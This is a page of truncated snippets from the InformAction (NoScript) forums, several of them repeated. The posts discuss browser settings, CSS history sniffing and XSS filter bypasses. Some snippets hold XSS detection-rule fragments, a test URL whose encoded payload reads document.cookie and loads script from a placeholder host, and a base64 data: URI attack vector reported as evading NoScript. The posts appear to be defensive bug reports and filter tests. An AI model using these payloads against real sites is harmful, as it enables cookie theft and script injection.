InformAction Forums

The only thing I can't abide is anything moving on a page where I'm trying to absorb text. I deal with that by setting the image.animation_mode pref to once. I use the replayanimations extension for the rare occasion when I want to see the animation one more time. Not marked compatible, but it work...

Why Weren't You Successful With The Arabs? LOL ! BTW, I find the member info on the left more beneficial to me. Far easier for me to pick up the avitar & or name. I seem not to get it from the post itself. Find myself reading a post, then after the fact backing up to see who posted it rather th...

The only thing I can't abide is anything moving on a page where I'm trying to absorb text. NukeAnythingEnhanced is my friend for those flickering smilies - - which I keep enabled in case I don't understand one in a post. I deal with that by setting the image.animation_mode pref to once. I use the r...

Why Weren't You Successful With The Arabs? BTW, I find the member info on the left more beneficial to me. Far easier for me to pick up the avitar & or name. I seem not to get it from the post itself. Find myself reading a post, then after the fact backing up to see who posted it rather then loo...

I can definitely do that. Those for the ones I originally mentioned are: relink.us: m (This has four URLs behind it.) secured.in: Not sure if these formats are different on the development end, but: A captcha-less single file at a single URL: m This is a captchaed group of 4 files: m protectlinks.co...

... nocase; msg:"javascript: GET request cross site scripting attempt"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;) alert(url_content:"mocha:"; nocase; msg:"mocha: GET request cross ...

... msg:"<br> tags GET request cross site scripting attempt"; url_re:"/%3Cbr.*%3E/i"; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;) === Request URL === http://bypass.xssing.com/testing.php?vector=%22%3E/XaDoS/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cscript%3Cbr%20/%3Esrc=%22http://www.site.com/XSS.js%22%3E%3C/script%3E ...

Hi Giorgio Maone,

The following attack vector: data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
was not being detected by NoScript when tested here: hxxp://bypass.xssing.com/testing.php?ve ... NjcmlwdD4=

luntrus

The result of the test (Jeremiah Grossman) is "Private Browsing mode is ON" either with private browsing ON, or OFF (it's a false positive). Not exactly: from the test's standpoint, it's ON because TorButton is doing more or less the same thing as Private Browsing and Safe History (i.e. b...

The result of the test (Jeremiah Grossman) is "Private Browsing mode is ON" either with private browsing ON, or OFF (it's a false positive). You must check Block History Reads during Non-Tor in torbutton preference. You can also test torbutton with this poc: http://ha.ckers.org/weird/CSS-h...

Hi bazzargh, As Giorgio Maone mentioned when it is done via JavaScript there is no problem, because NoScript perfectly takes care of that one and similar issues; as a more permanent solution to the visited links issue at hand - Copy the code below as css file at /Users/luntrus/Library/Application Su...

Hi Giorgio Maone, Hello I have come to join you here. As you know every modern browser to-day has a so-called "pr0n"-button aboard in order to leave no surfing-traces behind, but websites are now very well able to record who it is that is trying to surf "anonymously". The way thi...

... first line of page source with Noscript enabled, Firefox Javascript also enabled. Page displays but refreshing goes on CONTINUOUSLY. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" ...

Also, if you use the Hosts file from m, you'll be automatically blocked from visiting badscriptingsite.com, which is a pretty good clue not to allow it. But not being in that hosts file is no evidence that the site is safe. Enumerating Badness is "Dumb Idea" #2) . Or maybe I don't know wh...

Also, if you use the Hosts file from m, you'll be automatically blocked from visiting badscriptingsite.com, which is a pretty good clue not to allow it. But not being in that hosts file is no evidence that the site is safe. Enumerating Badness is "Dumb Idea" #2) . Or maybe I don't know wh...